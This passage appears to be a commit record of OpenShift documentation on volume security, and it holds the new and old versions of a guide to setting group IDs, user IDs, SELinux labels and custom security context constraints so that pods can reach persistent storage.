definition (or image)\nare applied to the actual, physical block device. Typically, block storage is\nnot shared.\n\nA `*fsGroup*` definition is shown below in the following pod definition\nfragment:\n\n====\n[source,yaml]\n----\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n securityContext: <1>\n fsGroup: 5555 <2>\n ...\n----\n<1> As with `*supplementalGroups*`, `*fsGroup*` must be defined globally to the pod,\nnot per container.\n<2> 5555 will become the group ID for the volume's group permissions and for all new\nfiles created in the volume.\n====\n\nAs with `*supplementalGroups*`, all containers in the above pod (assuming the\nmatching SCC or project allows the group *5555*) will be members of the group\n*5555*, and will have access to the block volume, regardless of the container's\nuser ID. If the pod matches the *restricted* SCC, whose `*fsGroup*` strategy is\n*RunAsAny*, then any `*fsGroup*` ID (including *5555*) will be accepted.\nHowever, if the SCC has its `*fsGroup*` strategy set to *MustRunAs*, and *5555*\nis not in the allowable range of `*fsGroup*` IDs, then the pod will fail to run.\n\n[[scc-fsgroup]]\n*fsGroups and Custom SCCs*\n\nTo remedy the situation in the previous example, a custom SCC can be created such that:\n\n- a minimum and maximum group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is better to create new SCCs versus modifying a predefined SCC, or changing\nthe range of allowed IDs in the predefined projects.\n\nConsider the following fragment of a new SCC definition:\n\n====\n----\n# oc export scc new-scc\n...\nkind: SecurityContextConstraints\n...\nfsGroup:\n type: MustRunAs <1>\n ranges: <2>\n - max: 6000\n min: 5000 <3>\n...\n----\n<1> *MustRunAs* triggers group ID range checking, whereas *RunAsAny* does not\nrequire range checking.\n<2> The range of allowed group IDs is 5000 through, and including, 5999. Multiple\nranges are supported but not used. The allowed group ID range here is 5000 through 5999, with\nthe default `*fsGroup*` being 5000.\n<3> The minimum value (or the entire range) can be omitted from the SCC, and thus\nrange checking and generating a default value will defer to the project's\n`*openshift.io\/sa.scc.supplemental-groups*` range. `*fsGroup*` and\n`*supplementalGroups*` use the same group field in the project; there is not a\nseparate range for `*fsGroup*`.\n====\n\nWhen the pod shown above runs against this new SCC (assuming, of course, the pod\nmatches the new SCC), it will start because the group *5555*, supplied in\nthe pod definition, is allowed by the custom SCC. Additionally, the pod will\n\"take over\" the block device, so when the block storage is viewed by a process\noutside of the pod, it will actually have *5555* as its group ID.\n\nA list of volumes supporting block ownership include:\n\n* AWS Elastic Block Store\n* OpenStack Cinder\n* Ceph RBD\n* GCE Persistent Disk\n* iSCSI\n* emptyDir\n* gitRepo\n\n[NOTE]\n====\nThis list is potentially incomplete.\n====\n\n[[user-id]]\n== User IDs\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or xref:fsgroup[fsGroup]) to gain\naccess to persistent storage versus using user IDs.\n====\n\nUser IDs can be defined in the container image or in the pod definition. In the\npod definition, a single user ID can be defined globally to all containers, or\nspecific to individual containers (or both). A user ID is supplied as shown in\nthe pod definition fragment below:\n\n[[pod-user-id-1000100001]]\n====\n[source,yaml]\n----\nspec:\n containers:\n - name: ...\n securityContext:\n runAsUser: 1000100001\n----\n====\n\nID 1000100001 in the above is container-specific and matches the owner ID on the\nexport. If the NFS export's owner ID was *54321*, then that number would be used\nin the pod definition. Specifying `*securityContext*` outside of the container\ndefinition makes the ID global to all containers in the pod.\n\nSimilar to group IDs, user IDs may be validated according to policies set in the\nSCC and\/or project. If the SCC's `*runAsUser*` strategy is set to *RunAsAny*,\nthen any user ID defined in the pod definition or in the image is allowed.\n\n[WARNING]\n====\nThis means even a UID of *0* (root) is allowed.\n====\n\nIf, instead, the `*runAsUser*` strategy is set to *MustRunAsRange*, then a\nsupplied user ID will be validated against a range of allowed IDs. If the pod\nsupplies no user ID, then the default ID is set to the minimum value of the range of\nallowable user IDs.\n\nReturning to the earlier xref:nfs-example[NFS example], the container needs its\nUID set to *1000100001*, which is shown in the pod fragment above. Assuming the\n*default* project and the *restricted* SCC, the pod's requested user ID of\n1000100001 will not be allowed, and therefore the pod will fail. The pod fails\nbecause:\n\n- it requests *1000100001* as its user ID,\n- all available SCCs use *MustRunAsRange* for their `*runAsUser*` strategy, so UID\nrange checking is required, and\n- *1000100001* is not included in the SCC or in the project's user ID range.\n\nTo remedy this situation, a new SCC can be created \nwith the appropriate user ID range. A new project could also be created with the\nappropriate user ID range defined. There are also other, less-preferred options:\n\n- The *restricted* SCC could be modified to include *1000100001* within its minimum and\nmaximum user ID range. This is not recommended as you should avoid modifying the\npredefined SCCs if possible.\n- The *restricted* SCC could be modified to use *RunAsAny* for the `*runAsUser*`\nvalue, thus eliminating ID range checking. This is *_strongly_* not recommended, as\ncontainers could run as root.\n- The *default* project's UID range could be changed to allow a user ID of\n*1000100001*. This is not generally advisable because only a single range of user IDs\ncan be specified, and thus other pods may not run if the range is altered.\n\n[[scc-runasuser]]\n*User IDs and Custom SCCs*\n\nIt is good practice to avoid modifying the predefined SCCs if possible. The\npreferred approach is to create a custom SCC that better fits an organization's\nsecurity needs, or xref:..\/..\/dev_guide\/projects.adoc#create-a-project[create a\nnew project] that supports the desired user IDs.\n\nTo remedy the situation in the previous example, a custom SCC can be created\nsuch that:\n\n- a minimum and maximum user ID is defined,\n- UID range checking is still enforced, and\n- the UID of *1000100001* is allowed.\n\nFor example:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\nrequiredDropCapabilities: null\nrunAsUser:\n type: MustRunAsRange <4>\n uidRangeMax: 1000100001 <5>\n uidRangeMin: 1000100001\n...\n----\n<1> The `allowXX` bools are the same as for the *restricted* SCC.\n<2> The name of this new SCC is *nfs-scc*.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. Higher priority SCCs sort before lower priority SCCs, and thus have a\nbetter chance of matching a new pod.\n<4> The `*runAsUser*` strategy is set to *MustRunAsRange*, which means UID range\nchecking is enforced.\n<5> The UID range is 1000100001 through 1000100001 (a range of one value).\n====\n\nNow, with `*runAsUser: 1000100001*` shown in the previous pod definition fragment,\nthe pod matches the new *nfs-scc* and is able to run with a UID of 1000100001.\n\n[[selinuxoptions]]\n== SELinux Options\n\nAll predefined SCCs, except for the *privileged* SCC, set the `*seLinuxContext*`\nto *MustRunAs*. So the SCCs most likely to match a pod's requirements will force\nthe pod to use an SELinux policy. The SELinux policy used by the pod can be\ndefined in the pod itself, in the image, in the SCC, or in the project (which\nprovides the default).\n\nSELinux labels can be defined in a pod's `*securityContext.seLinuxOptions*`\nsection, and supports `*user*`, `*role*`, `*type*`, and `*level*`:\n\n[NOTE]\n====\nLevel and MCS label are used interchangeably in this topic.\n====\n\n====\n----\n...\n securityContext: <1>\n seLinuxOptions:\n level: \"s0:c123,c456\" <2>\n...\n----\n<1> `*level*` can be defined globally for the entire pod, or individually for each\ncontainer.\n<2> SELinux level label.\n====\n\nHere are fragments from an SCC and from the *default* project:\n\n====\n----\n$ oc export scc scc-name\n...\nseLinuxContext:\n type: MustRunAs <1>\n\n# oc export project default\n...\nmetadata:\n annotations:\n openshift.io\/sa.scc.mcs: s0:c1,c0 <2>\n...\n----\n<1> *MustRunAs* causes volume relabeling.\n<2> If the label is not provided in the pod or in the SCC, then the default comes\nfrom the project.\n====\n\nAll predefined SCCs, except for the *privileged* SCC, set the `*seLinuxContext*`\nto *MustRunAs*. This forces pods to use MCS labels, which can be defined in the\npod definition, the image, or provided as a default.\n\nThe SCC determines whether or not to require an SELinux label and can provide a\ndefault label. If the `*seLinuxContext*` strategy is set to *MustRunAs* and the\npod (or image) does not define a label, {product-title} defaults to a label\nchosen from the SCC itself or from the project.\n\nIf `*seLinuxContext*` is set to *RunAsAny*, then no\ndefault labels are provided, and the container determines the final label. In\nthe case of Docker, the container will use a unique MCS label, which will not\nlikely match the labeling on existing storage mounts. Volumes which support\nSELinux management will be relabeled so that they are accessible by the\nspecified label and, depending on how exclusionary the label is, only that\nlabel.\n\nThis means two things for unprivileged containers:\n\n- The volume will be given a `*type*` which is accessible by unprivileged\ncontainers. This `*type*` is usually *svirt_sandbox_file_t*.\n- If a `*level*` is specified, the volume will be labeled with the given MCS\nlabel.\n\nFor a volume to be accessible by a pod, the pod must have both categories of the volume.\nSo a pod with *s0:c1,c2* will be able to access a volume with *s0:c1,c2*. A volume with\n*s0* will be accessible by all pods.\n\nIf pods fail authorization, or if the storage mount is failing due to\npermissions errors, then there is a possibility that SELinux enforcement is\ninterfering. One way to check for this is to run:\n\n----\n# ausearch -m avc --start recent\n----\n\nThis examines the log file for AVC (Access Vector Cache) errors.\n","old_contents":"[[install-config-persistent-storage-pod-security-context]]\n= Volume Security\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nThis topic provides a general guide on pod security as it relates to volume\nsecurity. For information on pod-level security in general, see\nxref:..\/..\/admin_guide\/manage_scc.adoc#admin-guide-manage-scc[Managing Security Context Constraints\n(SCC)] and the\nxref:..\/..\/architecture\/additional_concepts\/authorization.adoc#security-context-constraints[Security\nContext Constraint] concept topic. For information on the {product-title}\npersistent volume (PV) framework in general, see the\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[Persistent Storage]\nconcept topic.\n\nAccessing persistent storage requires coordination between the cluster and\/or\nstorage administrator and the end developer. The cluster administrator creates\nPVs, which abstract the underlying physical storage. The developer creates pods\nand, optionally, PVCs, which bind to PVs, based on matching criteria, such as\ncapacity.\n\nMultiple persistent volume claims (PVCs) within the same project can bind to the\nsame PV. However, once a PVC binds to a PV, that PV cannot be bound by a claim\noutside of the first claim's project. If the underlying storage needs to be\naccessed by multiple projects, then each project needs its own PV, which can\npoint to the same physical storage. In this sense, a bound PV is tied to a\nproject. For a detailed PV and PVC example, see the guide for\nhttps:\/\/github.com\/openshift\/origin\/tree\/master\/examples\/wordpress[WordPress and\nMySQL using NFS].\n\nFor the cluster administrator, granting pods access to PVs involves:\n\n- knowing the group ID and\/or user ID assigned to the actual storage,\n- understanding SELinux considerations, and\n- ensuring that these IDs are allowed in the range of legal IDs defined for the\nproject and\/or the SCC that matches the requirements of the pod.\n\nGroup IDs, the user ID, and SELinux values are defined in the\n`*SecurityContext*` section in a pod definition. Group IDs are global to the pod\nand apply to all containers defined in the pod. User IDs can also be global, or\nspecific to each container. Four sections control access to volumes:\n\n- xref:supplemental-groups[`*supplementalGroups*`]\n- xref:fsgroup[`*fsGroup*`]\n- xref:user-id[`*runAsUser*`]\n- xref:selinuxoptions[`*seLinuxOptions*`]\n\n[[sccs-defaults-allowed-ranges]]\n== SCCs, Defaults, and Allowed Ranges\n\nSCCs influence whether or not a pod is given a default user ID, `*fsGroup*` ID,\nsupplemental group ID, and SELinux label. They also influence whether or not IDs\nsupplied in the pod definition (or in the image) will be validated against a\nrange of allowable IDs. If validation is required and fails, then the pod will\nalso fail.\n\nSCCs define strategies, such as `*runAsUser*`, `*supplementalGroups*`, and\n`*fsGroup*`. These strategies help decide whether the pod is authorized.\nStrategy values set to *RunAsAny* are essentially stating that the pod can do\nwhat it wants regarding that strategy. Authorization is skipped for that\nstrategy and no {product-title} default is produced based on that strategy.\nTherefore, IDs and SELinux labels in the resulting container are based on\ncontainer defaults instead of {product-title} policies.\n\nFor a quick summary of *RunAsAny*:\n\n- Any ID defined in the pod definition (or image) is allowed.\n- Absence of an ID in the pod definition (and in the image) results in the\ncontainer assigning an ID, which is *root* (0) for Docker.\n- No SELinux labels are defined, so Docker will assign a unique label.\n\nFor these reasons, SCCs with *RunAsAny* for ID-related strategies should be\nprotected so that ordinary developers do not have access to the SCC. On the\nother hand, SCC strategies set to *MustRunAs* or *MustRunAsRange* trigger ID\nvalidation (for ID-related strategies), and cause default values to be supplied\nby {product-title} to the container when those values are not supplied directly\nin the pod definition or image.\n\nSCCs may define the range of allowed IDs (user or groups). If range checking is\nrequired (for example, using *MustRunAs*) and the allowable range is not defined\nin the SCC, then the project determines the ID range. Therefore, projects\nsupport ranges of allowable ID. However, unlike SCCs, projects do not define\nstrategies, such as `*runAsUser*`.\n\nAllowable ranges are helpful not only because they define the boundaries for\ncontainer IDs, but also because the minimum value in the range becomes the\ndefault value for the ID in question. For example, if the SCC ID strategy value\nis *MustRunAs*, the minimum value of an ID range is *100*, and the ID is absent\nfrom the pod definition, then 100 is provided as the default for this ID.\n\nAs part of pod admission, the SCCs available to a pod are examined (roughly, in\npriority order followed by most restrictive) to best match the requests of the\npod. Setting a SCC's strategy type to *RunAsAny* is less restrictive, whereas a\ntype of *MustRunAs* is more restrictive. All of these strategies are evaluated.\nTo see which SCC was assigned to a pod, use the `oc get pod` command:\n\n====\n----\n# oc get pod <pod_name> -o yaml\n...\nmetadata:\n annotations:\n openshift.io\/scc: nfs-scc <1>\n name: nfs-pod1 <2>\n namespace: default <3>\n...\n----\n<1> Name of the SCC that the pod used (in this case, a custom SCC).\n<2> Name of the pod.\n<3> Name of the project. \"Namespace\" is interchangeable with \"project\" in\n{product-title}. See\nxref:..\/..\/architecture\/core_concepts\/projects_and_users.adoc#namespaces[Projects\nand Users] for details.\n====\n\nIt may not be immediately obvious which SCC was matched by a pod, so the command\nabove can be very useful in understanding the UID, supplemental groups, and\nSELinux relabeling in a live container.\n\nAny SCC with a strategy set to *RunAsAny* allows specific values for that\nstrategy to be defined in the pod definition (and\/or image). When this applies\nto the user ID (`*runAsUser*`) it is prudent to restrict access to the SCC to\nprevent a container from being able to run as root.\n\nBecause pods often match the *restricted* SCC, it is worth knowing the security\nthis entails. The *restricted* SCC has the following characteristics:\n\n- User IDs are constrained due to the `*runAsUser*` strategy being set to\n*MustRunAsRange*. This forces user ID validation.\n- Because a range of allowable user IDs is not defined in the SCC (see `oc export\nscc restricted` for more details), the project's\n`*openshift.io\/sa.scc.uid-range*` range will be used for range checking and for\na default ID, if needed.\n- A default user ID is produced when a user ID is not specified in the pod\ndefinition due to `*runAsUser*` being set to *MustRunAsRange*.\n- An SELinux label is required (`seLinuxContext` set to _MustRunAs_), which uses\nthe project's default MCS label.\n- Arbitrary supplemental group IDs are allowed because no range checking is\nrequired. This is a result of both the `*supplementalGroups*` and `*fsGroup*`\nstrategies being set to *RunAsAny*.\n- Default supplemental groups are not produced for the running pod due to\n*RunAsAny* for the two group strategies above. Therefore, if no groups are\ndefined in the pod definition (or in the image), the container(s) will have no\nsupplemental groups predefined.\n\nThe following shows the *default* project and a custom SCC (*my-custom-scc*),\nwhich summarizes the interactions of the SCC and the project:\n\n====\n----\n$ oc get project default -o yaml <1>\n...\nmetadata:\n annotations: <2>\n openshift.io\/sa.scc.mcs: s0:c1,c0 <3>\n openshift.io\/sa.scc.supplemental-groups: 1000000000\/10000 <4>\n openshift.io\/sa.scc.uid-range: 1000000000\/10000 <5>\n\n$ oc get scc my-custom-scc -o yaml\n...\nfsGroup:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\nrunAsUser:\n type: MustRunAsRange <7>\n uidRangeMin: 65534\n uidRangeMax: 65634\nseLinuxContext: <8>\n type: MustRunAs\n SELinuxOptions: <9>\n user: <selinux-user-name>\n role: ...\n type: ...\n level: ...\nsupplementalGroups:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\n----\n<1> *default* is the name of the project.\n<2> Default values are only produced when the corresponding SCC strategy is not\n*RunAsAny*.\n<3> SELinux default when not defined in the pod definition or in the SCC.\n<4> Range of allowable group IDs. ID validation only occurs when the SCC\nstrategy is *RunAsAny*. There can be more than one range specified, separated by\ncommas. See below for xref:volsec-rangeformats[supported formats].\n<5> Same as *<4>* but for user IDs. Also, only a single range of user IDs is\nsupported.\n<6> *MustRunAs* enforces group ID range checking and provides the container's\ngroups default. Based on this SCC definition, the default is 5000 (the minimum\nID value). If the range was omitted from the SCC, then the default would be\n1000000000 (derived from the project). The other supported type, *RunAsAny*, does not\nperform range checking, thus allowing any group ID, and produces no default\ngroups.\n<7> *MustRunAsRange* enforces user ID range checking and provides a UID default.\n*Based on this SCC, the default UID is 65534 (the minimum value). If the minimum\n*and maximum range were omitted from the SCC, the default user ID would be\n*1000000000 (derived from the project). *MustRunAsNonRoot* and *RunAsAny* are\n*the other supported types. The range of allowed IDs can be defined to include\n*any user IDs required for the target storage.\n<8> When set to *MustRunAs*, the container is created with the SCC's SELinux\noptions, or the MCS default defined in the project. A type of *RunAsAny*\nindicates that SELinux context is not required, and, if not defined in the pod,\nis not set in the container.\n<9> The SELinux user name, role name, type, and labels can be defined here.\n====\n\n[[volsec-rangeformats]]\nTwo formats are supported for allowed ranges:\n\n1. `M\/N`, where `M` is the starting ID and `N` is the count, so the range becomes\n`M` through (and including) `M+N-1`.\n\n2. `M-N`, where `M` is again the starting ID and `N` is the ending ID. The default\ngroup ID is the starting ID in the first range, which is `1000000000` in this\nproject. If the SCC did not define a minimum group ID, then the project's\ndefault ID is applied.\n\n[[supplemental-groups]]\n== Supplemental Groups\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs (supplemental or\nxref:fsgroup[fsGroup]) to gain access to persistent storage versus using\nxref:user-id[user IDs].\n====\n\nSupplemental groups are regular Linux groups. When a process runs in Linux, it\nhas a UID, a GID, and one or more supplemental groups. These attributes can be\nset for a container's main process. The `*supplementalGroups*` IDs are typically\nused for controlling access to shared storage, such as NFS and GlusterFS,\nwhereas xref:fsgroup[fsGroup] is used for controlling access to block storage,\nsuch as Ceph RBD and iSCSI.\n\nThe {product-title} shared storage plug-ins mount volumes such that the POSIX\npermissions on the mount match the permissions on the target storage. For\nexample, if the target storage's owner ID is *1234* and its group ID is *5678*, then\nthe mount on the host node and in the container will have those same IDs.\nTherefore, the container's main process must match one or both of those IDs in\norder to access the volume.\n\n[[nfs-example]]\nFor example, consider the following NFS export.\n\nOn an {product-title} node:\n\n[NOTE]\n====\n`showmount` requires access to the ports used by `rpcbind` and `rpc.mount` on\nthe NFS server\n====\n\n====\n----\n# showmount -e <nfs-server-ip-or-hostname>\nExport list for f21-nfs.vm:\n\/opt\/nfs *\n----\n====\n\nOn the NFS server:\n\n====\n----\n# cat \/etc\/exports\n\/opt\/nfs *(rw,sync,root_squash)\n...\n\n# ls -lZ \/opt\/nfs -d\ndrwxrws---. nfsnobody 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n\n# id nfsnobody\nuid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)\n----\n====\n\n[NOTE]\n====\nIn the above, the owner is 65534 (*nfsnobody*), but the suggestions and examples in\nthis topic apply to any non-root owner.\n====\n\nThe *_\/opt\/nfs\/_* export is accessible by UID *65534* and the group *5555*. In\ngeneral, containers should not run as root, so in this NFS example, containers\nwhich are not run as UID *65534* or are not members the group *5555* will not be\nable to access the NFS export.\n\nOften, the SCC matching the pod does not allow a specific user ID to be\nspecified, thus using supplemental groups is a more flexible way to grant\nstorage access to a pod. For example, to grant NFS access to the export above,\nthe group *5555* can be defined in the pod definition:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n volumeMounts:\n - name: nfs <1>\n mountPath: \/usr\/share\/... <2>\n securityContext: <3>\n supplementalGroups: [5555] <4>\n volumes:\n - name: nfs <5>\n nfs:\n server: <nfs_server_ip_or_host>\n path: \/opt\/nfs <6>\n----\n<1> Name of the volume mount. Must match the name in the `*volumes*` section.\n<2> NFS export path as seen in the container.\n<3> Pod global security context. Applies to all containers in the pod. Each\ncontainer can also define its `*securityContext*`, however group IDs are global\nto the pod and cannot be defined for individual containers.\n<4> Supplemental groups, which is an array of IDs, is set to 5555. This grants\ngroup access to the export.\n<5> Name of the volume. Must match the name in the `*volumeMounts*` section.\n<6> Actual NFS export path on the NFS server.\n====\n\nAll containers in the above pod (assuming the matching SCC or project allows the\ngroup *5555*) will be members of the group *5555* and have access to the volume,\nregardless of the container's user ID. However, the assumption above is\ncritical. Sometimes, the SCC does not define a range of allowable group IDs but\nrequires group ID validation (due to `*supplementalGroups*` set to *MustRunAs*;\nnote this is not the case for the *restricted* SCC). The project will not likely\nallow a group ID of *5555*, unless the project has been customized for access to\nthis NFS export. So in this scenario, the above pod will fail because its group\nID of *5555* is not within the SCC's or the project's range of allowed group\nIDs.\n\n[[scc-supplemental-groups]]\n*Supplemental Groups and Custom SCCs*\n\nTo remedy the situation in xref:nfs-example[the previous example], a custom SCC\ncan be created such that:\n\n- a minimum and max group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is better to create new SCCs versus modifying a predefined SCC, or changing\nthe range of allowed IDs in the predefined projects.\n\nThe easiest way to create a new SCC is to export an existing SCC and customize\nthe YAML file to meet the requirements of the new SCC. For example:\n\n. Use the *restricted* SCC as a template for the new SCC:\n+\n----\n$ oc export scc restricted > new-scc.yaml\n----\n\n. Edit the *_new-scc.yaml_* file to your desired specifications.\n\n. Create the new SCC:\n+\n----\n$ oc create -f new-scc.yaml\n----\n\n[NOTE]\n====\nThe `oc edit scc` command can be used to modify an instantiated SCC.\n====\n\nHere is a fragment of a new SCC named *nfs-scc*:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\n...\nsupplementalGroups:\n type: MustRunAs <4>\n ranges:\n - min: 5000 <5>\n max: 6000\n...\n----\n<1> The `allow*` bools are the same as for the *restricted* SCC.\n<2> Name of the new SCC.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. Higher priority SCCs sort before lower priority SCCs and thus have a\nbetter chance of matching a new pod.\n<4> `*supplementalGroups*` is a strategy and it is set to *MustRunAs*, which means\ngroup ID checking is required.\n<5> Multiple ranges are supported. The allowed group ID range here is 5000 through\n5999, with the default supplemental group being 5000.\n====\n\nWhen the same pod shown earlier runs against this new SCC (assuming, of course,\nthe pod has access to the new SCC), it will start because the group *5555*,\nsupplied in the pod definition, is now allowed by the custom SCC.\n\n[[fsgroup]]\n== fsGroup\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or `*fsGroup*`) to gain access to\npersistent storage versus using xref:user-id[user IDs].\n====\n\n`*fsGroup*` defines a pod's \"file system group\" ID, which is added to the\ncontainer's supplemental groups. The `*supplementalGroups*` ID applies to shared\nstorage, whereas the `*fsGroup*` ID is used for block storage.\n\nBlock storage, such as Ceph RBD, iSCSI, and various cloud storage, is typically\ndedicated to a single pod which has requested the block storage volume, either\ndirectly or using a PVC. Unlike shared storage, block storage is taken over by a\npod, meaning that user and group IDs supplied in the pod definition (or image)\nare applied to the actual, physical block device. Typically, block storage is\nnot shared.\n\nA `*fsGroup*` definition is shown below in the following pod definition\nfragment:\n\n====\n[source,yaml]\n----\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n securityContext: <1>\n fsGroup: 5555 <2>\n ...\n----\n<1> As with `*supplementalGroups*`, `*fsGroup*` must be defined globally to the pod,\nnot per container.\n<2> 5555 will become the group ID for the volume's group permissions and for all new\nfiles created in the volume.\n====\n\nAs with `*supplementalGroups*`, all containers in the above pod (assuming the\nmatching SCC or project allows the group *5555*) will be members of the group\n*5555*, and will have access to the block volume, regardless of the container's\nuser ID. If the pod matches the *restricted* SCC, whose `*fsGroup*` strategy is\n*RunAsAny*, then any `*fsGroup*` ID (including *5555*) will be accepted.\nHowever, if the SCC has its `*fsGroup*` strategy set to *MustRunAs*, and *5555*\nis not in the allowable range of `*fsGroup*` IDs, then the pod will fail to run.\n\n[[scc-fsgroup]]\n*fsGroups and Custom SCCs*\n\nTo remedy the situation in the previous example, a custom SCC can be created such that:\n\n- a minimum and maximum group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is better to create new SCCs versus modifying a predefined SCC, or changing\nthe range of allowed IDs in the predefined projects.\n\nConsider the following fragment of a new SCC definition:\n\n====\n----\n# oc export scc new-scc\n...\nkind: SecurityContextConstraints\n...\nfsGroup:\n type: MustRunAs <1>\n ranges: <2>\n - max: 6000\n min: 5000 <3>\n...\n----\n<1> *MustRunAs* triggers group ID range checking, whereas *RunAsAny* does not\nrequire range checking.\n<2> The range of allowed group IDs is 5000 through, and including, 5999. Multiple\nranges are supported. The allowed group ID range here is 5000 through 5999, with\nthe default `*fsGroup*` being 5000.\n<3> The minimum value (or the entire range) can be omitted from the SCC, and thus\nrange checking and generating a default value will defer to the project's\n`*openshift.io\/sa.scc.supplemental-groups*` range. `*fsGroup*` and\n`*supplementalGroups*` use the same group field in the project; there is not a\nseparate range for `*fsGroup*`.\n====\n\nWhen the pod shown above runs against this new SCC (assuming, of course, the pod\nhas access to the new SCC), it will start because the group *5555*, supplied in\nthe pod definition, is allowed by the custom SCC. Additionally, the pod will\n\"take over\" the block device, so when the block storage is viewed by a process\noutside of the pod, it will actually have *5555* as its group ID.\n\nCurrently the list of volumes which support block ownership (block) management\ninclude:\n\n* AWS Elastic Block Store\n* OpenStack Cinder\n* Ceph RBD\n* GCE Persistent Disk\n* iSCSI\n* emptyDir\n* gitRepo\n\n[[user-id]]\n== User IDs\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or xref:fsgroup[fsGroup]) to gain\naccess to persistent storage versus using user IDs.\n====\n\nUser IDs can be defined in the container image or in the pod definition. In the\npod definition, a single user ID can be defined globally to all containers, or\nspecific to individual containers (or both). A user ID is supplied as shown in\nthe pod definition fragment below:\n\n[[pod-user-id-65534]]\n====\n[source,yaml]\n----\nspec:\n containers:\n - name: ...\n securityContext:\n runAsUser: 65534\n----\n====\n\nID 65534 in the above is container-specific and matches the owner ID on the\nexport. If the NFS export's owner ID was *54321*, then that number would be used\nin the pod definition. Specifying `*securityContext*` outside of the container\ndefinition makes the ID global to all containers in the pod.\n\nSimilar to group IDs, user IDs may be validated according to policies set in the\nSCC and\/or project. If the SCC's `*runAsUser*` strategy is set to *RunAsAny*,\nthen any user ID defined in the pod definition or in the image is allowed.\n\n[WARNING]\n====\nThis means even a UID of *0* (root) is allowed.\n====\n\nIf, instead, the `*runAsUser*` strategy is set to *MustRunAsRange*, then a\nsupplied user ID will be validated against a range of allowed IDs. If the pod\nsupplies no user ID, then the default ID is the minimum value of the range of\nallowable user IDs.\n\nReturning to the earlier xref:nfs-example[NFS example], the container needs its\nUID set to *65534*, which is shown in the pod fragment above. Assuming the\n*default* project and the *restricted* SCC, the pod's requested user ID of\n*65534* will *not* be allowed, and therefore the pod will fail. The pod fails\nbecause:\n\n- it requests *65534* as its user ID,\n- all available SCCs use *MustRunAsRange* for their `*runAsUser*` strategy, so UID\nrange checking is required, and\n- *65534* is not included in the SCC or project's user ID range.\n\nTo address this situation, the recommended path would be to create a new SCC\nwith the appropriate user ID range. A new project could also be created with the\nappropriate user ID range defined. There are other, less-preferred options:\n\n- The *restricted* SCC could be modified to include *65534* within its minimum and\nmaximum user ID range. This is not recommended as you should avoid modifying the\npredefined SCCs if possible.\n- The *restricted* SCC could be modified to use *RunAsAny* for the `*runAsUser*`\nvalue, thus eliminating ID range checking. This is strongly not recommended, as\ncontainers could run as root.\n- The *default* project's UID range could be changed to allow a user ID of\n*65534*. This is not generally advisable because only a single range of user IDs\ncan be specified.\n\n[[scc-runasuser]]\n*User IDs and Custom SCCs*\n\nIt is good practice to avoid modifying the predefined SCCs if possible. The\npreferred approach is to create a custom SCC that better fits an organization's\nsecurity needs, or xref:..\/..\/dev_guide\/projects.adoc#create-a-project[create a\nnew project] that supports the desired user IDs.\n\nTo remedy the situation in the previous example, a custom SCC can be created\nsuch that:\n\n- a minimum and maximum user ID is defined,\n- UID range checking is still enforced, and\n- the UID of *65534* will be allowed.\n\nFor example:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\nrequiredDropCapabilities: null\nrunAsUser:\n type: MustRunAsRange <4>\n uidRangeMax: 65534 <5>\n uidRangeMin: 65534\n...\n----\n<1> The `allow*` bools are the same as for the *restricted* SCC.\n<2> The name of this new SCC is *nfs-scc*.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. Higher priority SCCs sort before lower priority SCCs, and thus have a\nbetter chance of matching a new pod.\n<4> The `*runAsUser*` strategy is set to *MustRunAsRange*, which means UID range\nchecking is enforced.\n<5> The UID range is 65534 through 65534 (a range of one value).\n====\n\nNow, with `*runAsUser: 65534*` shown in the previous pod definition fragment,\nthe pod matches the new *nfs-scc* and is able to run with a UID of 65534.\n\n[[selinuxoptions]]\n== SELinux Options\n\nAll predefined SCCs, except for the *privileged* SCC, set the `*seLinuxContext*`\nto *MustRunAs*. So the SCCs most likely to match a pod's requirements will force\nthe pod to use an SELinux policy. The SELinux policy used by the pod can be\ndefined in the pod itself, in the image, in the SCC, or in the project (which\nprovides the default).\n\nSELinux labels can be defined in a pod's `*securityContext.seLinuxOptions*`\nsection, and supports `*user*`, `*role*`, `*type*`, and `*level*`:\n\n[NOTE]\n====\nLevel and 